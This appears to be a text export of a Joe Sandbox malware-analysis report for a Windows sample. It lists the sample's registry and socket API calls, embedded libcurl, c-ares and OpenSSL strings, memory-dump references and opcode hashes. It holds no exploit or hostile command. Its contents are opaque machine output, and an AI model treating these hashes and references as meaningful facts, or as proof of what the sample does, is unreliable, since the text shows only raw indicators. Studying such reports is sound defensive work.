                                                    • RegCloseKey.KERNELBASE(?), ref: 0082ADD9
                                                    • RegEnumKeyExA.KERNELBASE ref: 0082AE08
                                                    • RegOpenKeyExA.KERNELBASE(?,?,00000000,00000001,?), ref: 0082AE2A
                                                    • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,00000000), ref: 0082AE54
                                                    • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,00000000), ref: 0082AF63
                                                    • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,?), ref: 0082AFB2
                                                    • RegQueryValueExA.KERNELBASE(?,DhcpDomain,00000000,00000000,00000000,00000000), ref: 0082B072
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1430444255.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                     • Associated: 00000000.00000002.1430429452.0000000000770000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1430444255.0000000000D31000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1430444255.0000000000E95000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1430444255.0000000000E97000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1430898281.0000000000E9A000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1430912657.0000000000E9C000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1430912657.0000000001026000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1430912657.000000000113E000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1430912657.0000000001143000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1430912657.000000000121D000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1430912657.0000000001226000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1430912657.0000000001234000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1431194841.0000000001235000.00000080.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1431306823.00000000013F6000.00000040.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_770000_jklg6EIhyR.jbxd
                                                    Similarity
                                                    • API ID: QueryValue$Open$AdaptersAddresses$CloseEnum
                                                    • String ID: DhcpDomain$Domain$PrimaryDNSSuffix$SearchList$Software\Policies\Microsoft\System\DNSClient$Software\Policies\Microsoft\Windows NT\DNSClient$System\CurrentControlSet\Services\Tcpip\Parameters$System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces
                                                    • API String ID: 4281207131-1047472027
                                                    • Opcode ID: 9590d33fa915b16819249925057d616ed74ca0f1f6646577f0aaef397aafdb3d
                                                    • Instruction ID: 740ee3f04cb8f4ea869deef5d2786f6ad70533f2499b0baf47e00fd2eec88e85
                                                    • Opcode Fuzzy Hash: 9590d33fa915b16819249925057d616ed74ca0f1f6646577f0aaef397aafdb3d
                                                    • Instruction Fuzzy Hash: 5472CFB1604311AFE7249B24ED81B6B7BE8FF85700F144828F985EB291E775E984CB53
                                                    APIs
                                                    • setsockopt.WS2_32(?,00000006,00000001,00000001,00000004), ref: 007AA831
                                                    Strings
                                                    • sa_addr inet_ntop() failed with errno %d: %s, xrefs: 007AA6CE
                                                    • cf-socket.c, xrefs: 007AA5CD, 007AA735
                                                    • Local Interface %s is ip %s using address family %i, xrefs: 007AAE60
                                                    • @, xrefs: 007AAC42
                                                    • cf_socket_open() -> %d, fd=%d, xrefs: 007AA796
                                                    • Name '%s' family %i resolved to '%s' family %i, xrefs: 007AADAC
                                                    • Couldn't bind to interface '%s' with errno %d: %s, xrefs: 007AAD0A
                                                    • @, xrefs: 007AA8F4
                                                    • bind failed with errno %d: %s, xrefs: 007AB080
                                                    • Couldn't bind to '%s' with errno %d: %s, xrefs: 007AAE1F
                                                    • Trying [%s]:%d..., xrefs: 007AA689
                                                    • Bind to local port %d failed, trying next, xrefs: 007AAFE5
                                                    • Local port: %hu, xrefs: 007AAF28
                                                    • Could not set TCP_NODELAY: %s, xrefs: 007AA871
                                                    • Trying %s:%d..., xrefs: 007AA7C2, 007AA7DE
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1430444255.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                     • Associated: 00000000.00000002.1430429452.0000000000770000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1430444255.0000000000D31000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1430444255.0000000000E95000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1430444255.0000000000E97000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1430898281.0000000000E9A000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1430912657.0000000000E9C000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1430912657.0000000001026000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1430912657.000000000113E000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1430912657.0000000001143000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1430912657.000000000121D000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1430912657.0000000001226000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1430912657.0000000001234000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1431194841.0000000001235000.00000080.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1431306823.00000000013F6000.00000040.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_770000_jklg6EIhyR.jbxd
                                                    Similarity
                                                    • API ID: setsockopt
                                                    • String ID: Trying %s:%d...$ Trying [%s]:%d...$ @$ @$Bind to local port %d failed, trying next$Could not set TCP_NODELAY: %s$Couldn't bind to '%s' with errno %d: %s$Couldn't bind to interface '%s' with errno %d: %s$Local Interface %s is ip %s using address family %i$Local port: %hu$Name '%s' family %i resolved to '%s' family %i$bind failed with errno %d: %s$cf-socket.c$cf_socket_open() -> %d, fd=%d$sa_addr inet_ntop() failed with errno %d: %s
                                                    • API String ID: 3981526788-2373386790
                                                    • Opcode ID: 982c21b5bb70b6987a89298b5c98612d18f158dcff7205a7abba383672a0c860
                                                    • Instruction ID: 0722eafe72ed00200e86b16392132619f9ca1e574956db714d68f5eca1c57438
                                                    • Opcode Fuzzy Hash: 982c21b5bb70b6987a89298b5c98612d18f158dcff7205a7abba383672a0c860
                                                    • Instruction Fuzzy Hash: 0362F471508341AFE7258F24C846BABB7E4AFD2314F044A19F98897292E779E845CB93

                                                     Control-flow Graph (function at 839740; nodes marked Executed / Not Executed)
                                                     [rendered control-flow graph image not present in this text export]
                                                    APIs
                                                    • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters,00000000,00020019,?), ref: 00839946
                                                    • RegQueryValueExA.KERNELBASE(?,DatabasePath,00000000,00000000,?,00000104), ref: 00839974
                                                    • RegCloseKey.KERNELBASE(?), ref: 0083998B
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1430444255.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                     • Associated: 00000000.00000002.1430429452.0000000000770000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1430444255.0000000000D31000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1430444255.0000000000E95000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1430444255.0000000000E97000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1430898281.0000000000E9A000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1430912657.0000000000E9C000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1430912657.0000000001026000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1430912657.000000000113E000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1430912657.0000000001143000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1430912657.000000000121D000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1430912657.0000000001226000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1430912657.0000000001234000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1431194841.0000000001235000.00000080.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1431306823.00000000013F6000.00000040.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_770000_jklg6EIhyR.jbxd
                                                    Similarity
                                                    • API ID: CloseOpenQueryValue
                                                    • String ID: #$#$CARES_HOSTS$DatabasePath$System\CurrentControlSet\Services\Tcpip\Parameters$\hos$sts
                                                    • API String ID: 3677997916-4129964100
                                                    • Opcode ID: 1f4ebdfc39f343db71c2bfff6cee26b01dea4de88bb881123df7e9048d8f2d46
                                                    • Instruction ID: 6bd294b4970a1c260cf864d82573934321d9df8aab4f8e000994fd096fe94877
                                                    • Opcode Fuzzy Hash: 1f4ebdfc39f343db71c2bfff6cee26b01dea4de88bb881123df7e9048d8f2d46
                                                    • Instruction Fuzzy Hash: 4B32A5B5904211ABEB11AB29EC42A1B7694FF94318F084438FD89D6263FB71ED64C7D3

                                                     Control-flow Graph (function at 7a8b50; nodes marked Executed / Not Executed)
                                                     [rendered control-flow graph image not present in this text export]
                                                    APIs
                                                    • connect.WS2_32(?,?,00000001), ref: 007A8C30
                                                    • SleepEx.KERNELBASE(00000000,00000000), ref: 007A8CF3
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1430444255.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_770000_jklg6EIhyR.jbxd
                                                    Similarity
                                                    • API ID: Sleepconnect
                                                    • String ID: cf-socket.c$connect to %s port %u from %s port %d failed: %s$connected$local address %s port %d...$not connected yet
                                                    • API String ID: 238548546-879669977
                                                    • Opcode ID: 9f7a512265a544571ca0cb58ed6021654e9ba348740ca0c76c47578f5ce85517
                                                    • Instruction ID: 5adbd0832fd7fc02c011ee17543eb988986cf3c4a0d3ff828bbf8f4685a6350b
                                                    • Opcode Fuzzy Hash: 9f7a512265a544571ca0cb58ed6021654e9ba348740ca0c76c47578f5ce85517
                                                    • Instruction Fuzzy Hash: 0BB1C470604346EFDB50DF24C985BA7B7E0AF86314F048A2DE8594B2D2DB78EC54CB62

                                                    Control-flow Graph (API calls in graph: RegOpenKeyExA, RegEnumKeyExA, RegQueryValueExA, RegCloseKey)
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1430444255.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_770000_jklg6EIhyR.jbxd
                                                    Similarity
                                                    • API ID: EnumOpen
                                                    • String ID: d
                                                    • API String ID: 3231578192-2564639436
                                                    • Opcode ID: 564adb494cda964f46f1a3546854767de6ada85683d759fc323967af526f9d31
                                                    • Instruction ID: 009e31603bb3de9f66a2396801f4b9beffd29ad090b171c1f6f1358ecd3a03c5
                                                    • Opcode Fuzzy Hash: 564adb494cda964f46f1a3546854767de6ada85683d759fc323967af526f9d31
                                                    • Instruction Fuzzy Hash: 0D71B5B4904309DFDB10DF69D5847AEBBF1BF84308F1088ADE59897311E7749A888F92

                                                    Control-flow Graph (API calls in graph: send)
                                                    APIs
                                                    • send.WS2_32(multi.c,?,?,?,N=w,00000000,?,?,007807BF), ref: 007776EB
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1430444255.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_770000_jklg6EIhyR.jbxd
                                                    Similarity
                                                    • API ID: send
                                                    • String ID: LIMIT %s:%d %s reached memlimit$N=w$SEND %s:%d send(%lu) = %ld$multi.c$send
                                                    • API String ID: 2809346765-95302684
                                                    • Opcode ID: 118840f80f748329601b5da9f1d842a6b85cf642049addfe42effe739868af6f
                                                    • Instruction ID: 53058c7c52b46e2de56e89652c10f4c16352ee32155b584042e49ede2864a426
                                                    • Opcode Fuzzy Hash: 118840f80f748329601b5da9f1d842a6b85cf642049addfe42effe739868af6f
                                                    • Instruction Fuzzy Hash: 6311E7B5A083456FD9149B16AC4AE2B3B5CDBC2BA8F45494AF90C632D1D5769C04C2B2

                                                    Control-flow Graph (API calls in graph: WSAIoctl, setsockopt)
                                                    APIs
                                                    • WSAIoctl.WS2_32(?,4004747B,00000000,00000000,?,00000004,?,00000000,00000000), ref: 007A935D
                                                    • setsockopt.WS2_32(?,0000FFFF,00001001,00000000,00000004,?,00000004,?,00000000,00000000), ref: 007A9388
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1430444255.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_770000_jklg6EIhyR.jbxd
                                                    Similarity
                                                    • API ID: Ioctlsetsockopt
                                                    • String ID: Send failure: %s$cf-socket.c$send(len=%zu) -> %d, err=%d
                                                    • API String ID: 1903391676-2691795271
                                                    • Opcode ID: 2f04fb463d911efab3201f96c1acc2377dde4a6381c20a7c320a5e7eaa8a84da
                                                    • Instruction ID: be6143a1a5c4ee4f0a1897281ca59e1f91f1772426b7f3cb80606a68ff22c792
                                                    • Opcode Fuzzy Hash: 2f04fb463d911efab3201f96c1acc2377dde4a6381c20a7c320a5e7eaa8a84da
                                                    • Instruction Fuzzy Hash: 2E51E470600345AFEB14DF24C881FAA77B5FF89314F148628FE488B282D735E961C791

                                                    Control-flow Graph (API calls in graph: recv)
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1430444255.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_770000_jklg6EIhyR.jbxd
                                                    Similarity
                                                    • API ID: recv
                                                    • String ID: LIMIT %s:%d %s reached memlimit$RECV %s:%d recv(%lu) = %ld$recv
                                                    • API String ID: 1507349165-640788491
                                                    • Opcode ID: bd844c93a9c1ed2b8cb1c9ee013ede5ab90226c57005769581e30c8aed43420b
                                                    • Instruction ID: a01571fd6c60006224206f955ecc836af308fe8c09b6e624c10ea64e66cb579a
                                                    • Opcode Fuzzy Hash: bd844c93a9c1ed2b8cb1c9ee013ede5ab90226c57005769581e30c8aed43420b
                                                    • Instruction Fuzzy Hash: A81127B5A093547FD5149B129C4AE2B7B6CDBC2BA8F054A5AF80C233D1D5369C04C6F2

                                                    Control-flow Graph (API calls in graph: socket)
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1430444255.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_770000_jklg6EIhyR.jbxd
                                                    Similarity
                                                    • API ID: socket
                                                    • String ID: FD %s:%d socket() = %d$LIMIT %s:%d %s reached memlimit$socket
                                                    • API String ID: 98920635-842387772
                                                    • Opcode ID: 55730952946e23b8ab3eb77203aaf7d0ed136721f7b7fa7dc286da2c3c0ece2d
                                                    • Instruction ID: ecf273aacf265d0273fc8a7b7f571ebb4fce0411b9d3eac37afc9e630244221e
                                                    • Opcode Fuzzy Hash: 55730952946e23b8ab3eb77203aaf7d0ed136721f7b7fa7dc286da2c3c0ece2d
                                                    • Instruction Fuzzy Hash: 57116F71A043517BDE105B2A6C0BF5B3B98DFC27B4F454956F818A62E2D2368C58C2F1

                                                    Control-flow Graph (API calls in graph: getsockname)
                                                    APIs
                                                    • getsockname.WS2_32(?,?,00000080), ref: 007AA1C7
                                                    Strings
                                                    • ssloc inet_ntop() failed with errno %d: %s, xrefs: 007AA23B
                                                    • getsockname() failed with errno %d: %s, xrefs: 007AA1F0
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1430444255.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_770000_jklg6EIhyR.jbxd
                                                    Similarity
                                                    • API ID: getsockname
                                                    • String ID: getsockname() failed with errno %d: %s$ssloc inet_ntop() failed with errno %d: %s
                                                    • API String ID: 3358416759-2605427207

                                                     Control-flow Graph (graph not reproduced)
                                                    APIs
                                                    • WSAStartup.WS2_32(00000202), ref: 0078D65B
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1430444255.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                    Similarity
                                                    • API ID: Startup
                                                    • String ID: if_nametoindex$iphlpapi.dll
                                                    • API String ID: 724789610-3097795196

                                                     Control-flow Graph (graph not reproduced)
                                                    APIs
                                                    • socket.WS2_32(FFFFFFFF,?,00000000), ref: 0083AB9B
                                                    • ioctlsocket.WS2_32(00000000,8004667E,00000001), ref: 0083ABE3
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1430444255.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                    Similarity
                                                    • API ID: ioctlsocketsocket
                                                    • String ID:
                                                    • API String ID: 416004797-0
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1430444255.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                    Similarity
                                                    • API ID: CloseEvent
                                                    • String ID: multi.c
                                                    • API String ID: 2624557715-214371023
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1430444255.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                    Similarity
                                                    • API ID: closesocket
                                                    • String ID: FD %s:%d sclose(%d)
                                                    • API String ID: 2781271927-3116021458
                                                    APIs
                                                    • connect.WS2_32(-00000028,-00000028,-00000028,-00000001,-00000028,?,-00000028,0083B29E,?,00000000,?,?), ref: 0083B0BA
                                                    • WSAGetLastError.WS2_32(?,?,?,?,?,?,?,?,?,?,00000000,0000000B,?,?,00823C41,00000000), ref: 0083B0C1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1430444255.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                    Similarity
                                                    • API ID: ErrorLastconnect
                                                    • String ID:
                                                    • API String ID: 374722065-0
                                                    APIs
                                                    • gethostname.WS2_32(00000000,00000040), ref: 00824AA5
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1430444255.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                    Similarity
                                                    • API ID: gethostname
                                                    • String ID:
                                                    • API String ID: 144339138-0
                                                    APIs
                                                    • getsockname.WS2_32(?,?,00000080), ref: 0083AFD0
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1430444255.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                    Similarity
                                                    • API ID: getsockname
                                                    • String ID:
                                                    • API String ID: 3358416759-0
                                                    APIs
                                                    • send.WS2_32(?,?,?,00000000,00000000,?), ref: 0083A97E
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1430444255.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                    Similarity
                                                    • API ID: send
                                                    • String ID:
                                                    • API String ID: 2809346765-0
                                                    • Opcode ID: d4ada46795e29a87f5fbb48be1d1d0bbfdcc43c9c89ece78af8ca2f57152dbed
                                                    • Instruction ID: 5bc779ae46e7e4f54998eb80eded049ad1087c88ca3999b097edc06ff53eb9e9
                                                    • Opcode Fuzzy Hash: d4ada46795e29a87f5fbb48be1d1d0bbfdcc43c9c89ece78af8ca2f57152dbed
                                                    • Instruction Fuzzy Hash: 5901A272B01710AFC6148F24DC45B5AFBA9FFC4720F068659EA986B361C331AC118BD1
                                                    APIs
                                                    • socket.WS2_32(?,0083B280,00000000,-00000001,00000000,0083B280,?,?,00000002,00000011,?,?,00000000,0000000B,?,?), ref: 0083AF67
                                                    Similarity
                                                    • API ID: socket
                                                    • String ID:
                                                    • API String ID: 98920635-0
                                                    • Opcode ID: 35070f1b1e0794f6e91dd8874acbab1258b4af4038c717696b61b56a92fc537c
                                                    • Instruction ID: 7e03a9db2e346c7c45b447e49bf956be803fb9c1905de53933a016dfb596389b
                                                    • Opcode Fuzzy Hash: 35070f1b1e0794f6e91dd8874acbab1258b4af4038c717696b61b56a92fc537c
                                                    • Instruction Fuzzy Hash: 0CE0EDB6A092216BD654DB18E844AABF36DEFC4B20F055A49B89467214C730AC508BE2
                                                    APIs
                                                    • closesocket.WS2_32(?,00839422,?,?,?,?,?,?,?,?,?,?,?,00823377,00C08640,00000000), ref: 0083B04D
                                                    Similarity
                                                    • API ID: closesocket
                                                    • String ID:
                                                    • API String ID: 2781271927-0
                                                    • Opcode ID: a9fc4c24bcf5d8b75f91b9f805bd7b265a6447674bd6187fc016e3a3c882ea2a
                                                    • Instruction ID: 0e5365a978aba1b9529fdeb44cb07cd92497401de2a9fd605951a3321f9704dc
                                                    • Opcode Fuzzy Hash: a9fc4c24bcf5d8b75f91b9f805bd7b265a6447674bd6187fc016e3a3c882ea2a
                                                    • Instruction Fuzzy Hash: 62D0C27470460157CA288A14C894A57762BBFD0720FA8CF6CE12C8A154CB3BCC438A81
                                                    APIs
                                                    • ioctlsocket.WS2_32(?,8004667E,?,?,007AAF56,?,00000001), ref: 007D67FC
                                                    Similarity
                                                    • API ID: ioctlsocket
                                                    • String ID:
                                                    • API String ID: 3577187118-0
                                                    • Opcode ID: c7122a06170a26ae89b9efe87d17e55abbb909d88b7b46e08d40b33f4e9b2539
                                                    • Instruction ID: 2c403e2d6a0cdf6dc2de0a1d303b2a4452d207a0fd9d52673b7443b6c3eaab71
                                                    • Opcode Fuzzy Hash: c7122a06170a26ae89b9efe87d17e55abbb909d88b7b46e08d40b33f4e9b2539
                                                    • Instruction Fuzzy Hash: 44C012F1218101AFC6088714D455B2F76D9DB44355F01581CB04691180EA305990CB16
                                                    APIs
                                                    Similarity
                                                    • API ID: CloseHandle
                                                    • String ID:
                                                    • API String ID: 2962429428-0
                                                    • Opcode ID: fb2f196ed12c1871ec045e4da30f91bca636c8d49ff5bb4832064e7d09411a96
                                                    • Instruction ID: 138044f480c4fd231269cf0959f771e68569a4b41de680a12cf8e30284f940bf
                                                    • Opcode Fuzzy Hash: fb2f196ed12c1871ec045e4da30f91bca636c8d49ff5bb4832064e7d09411a96
                                                    • Instruction Fuzzy Hash: 3C3197B49053099FCB00EFB8D5856AEBBF1BF44344F008969E9A8A7351E734DA48DF52
                                                    Strings
                                                    Similarity
                                                    • API ID:
                                                    • String ID: %3lld %s %3lld %s %3lld %s %s %s %s %s %s %s$ %% Total %% Received %% Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed$%2lld:%02lld:%02lld$%3lldd %02lldh$%7lldd$** Resuming transfer from byte position %lld$--:-$--:-$--:-$-:--$-:--$-:--$Callback aborted
                                                    • API String ID: 0-122532811
                                                    • Opcode ID: 731248e33cf70ef8005214d72cdd39722a08e71c1c4f666920895a86caa7dfff
                                                    • Instruction ID: 1a805f17eb6676be6c23f4e3dae0a911ea0612489e6210b0c0b3572494b71540
                                                    • Opcode Fuzzy Hash: 731248e33cf70ef8005214d72cdd39722a08e71c1c4f666920895a86caa7dfff
                                                    • Instruction Fuzzy Hash: C342F871B08705AFD718DE28CC45B6BB7EAEBC8704F04892CF54D97291D779AC148B92
                                                    Strings
                                                    Similarity
                                                    • API ID:
                                                    • String ID: -vc$ans$ate$attempts$ndot$out$retr$retr$rota$time$use-$usev
                                                    • API String ID: 0-1574211403
                                                    • Opcode ID: 1c262e33fe9cdeb002c24049d1f8f60c6f307c1276813b18aed13bebd3e59d18
                                                    • Instruction ID: dbe78a148e612989b58f6d172910b68e27533e383f0059d97b189bb432b051d7
                                                    • Opcode Fuzzy Hash: 1c262e33fe9cdeb002c24049d1f8f60c6f307c1276813b18aed13bebd3e59d18
                                                    • Instruction Fuzzy Hash: 1661E8A5A0832467E714A628BC52B3B76D9FBD5314F04843DFCCAD6382FA71D9948293
                                                    Strings
                                                    Similarity
                                                    • API ID:
                                                    • String ID: %.*s%%25%s]$%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s$%s://$:;@?+$file$file://%s%s%s$https$urlapi.c$xn--
                                                    • API String ID: 0-1914377741
                                                    • Opcode ID: 8046999a6ea2c54798108d1c207185136bbcf82e2ff49dfecb64c47cea658f95
                                                    • Instruction ID: 00096978e33a6c3e7a607f4dedfe60437d312ecda44630caa8e20dce247784fc
                                                    • Opcode Fuzzy Hash: 8046999a6ea2c54798108d1c207185136bbcf82e2ff49dfecb64c47cea658f95
                                                    • Instruction Fuzzy Hash: F5725970608B519FEF238A28E4467A6B7D29F91344F08862CED855B393E77EDD84C391
                                                    Strings
                                                    Similarity
                                                    • API ID:
                                                    • String ID: !$EVP_DecryptFinal_ex$EVP_DecryptUpdate$EVP_EncryptFinal_ex$assertion failed: b <= sizeof(ctx->buf)$assertion failed: b <= sizeof(ctx->final)$crypto/evp/evp_enc.c
                                                    • API String ID: 0-2550110336
                                                    • Opcode ID: e5c9a61349646eaf48d287c59204d66f6aa92e8cc054288cefd25237d88bcc30
                                                    • Instruction ID: 6f0a7d53cfd9fb6a3a97e99a0065f71ed3ace3f9ceeed4c0759b62eed1638699
                                                    • Opcode Fuzzy Hash: e5c9a61349646eaf48d287c59204d66f6aa92e8cc054288cefd25237d88bcc30
                                                    • Instruction Fuzzy Hash: 67325734B48310EFD724AAA09C43F7B7799AF80B08F184928F945662D7E7B4E8548F52
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1430444255.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000000.00000002.1430429452.0000000000770000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1430444255.0000000000D31000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1430444255.0000000000E95000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1430444255.0000000000E97000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1430898281.0000000000E9A000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1430912657.0000000000E9C000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1430912657.0000000001026000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1430912657.000000000113E000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1430912657.0000000001143000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1430912657.000000000121D000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1430912657.0000000001226000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1430912657.0000000001234000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1431194841.0000000001235000.00000080.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1431306823.00000000013F6000.00000040.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_770000_jklg6EIhyR.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: $.$;$?$?$xn--$xn--
                                                    • API String ID: 0-543057197
                                                    • Opcode ID: 458bc0157e721e047bb302493944f418a18c6404993733a47ba20545a7d55346
                                                    • Instruction ID: 36cd332c8d714e0dfda5adf866588c95825c0db5f37bf2fd8e23cad2d8220303
                                                    • Opcode Fuzzy Hash: 458bc0157e721e047bb302493944f418a18c6404993733a47ba20545a7d55346
                                                    • Instruction Fuzzy Hash: 0922C1B2E08705ABEB249A289C41B6B76D4FFD4348F04453CFA99D6293E735D9048BD2
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1430444255.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_770000_jklg6EIhyR.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: (nil)$-$.%d$0$0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ$0123456789abcdefghijklmnopqrstuvwxyz
                                                    • API String ID: 0-2555271450
                                                    • Opcode ID: fdd083c6dd855bdfa6735a9ac11f67d3a9d4484dcbb22bcbe530bcb48a1b5f55
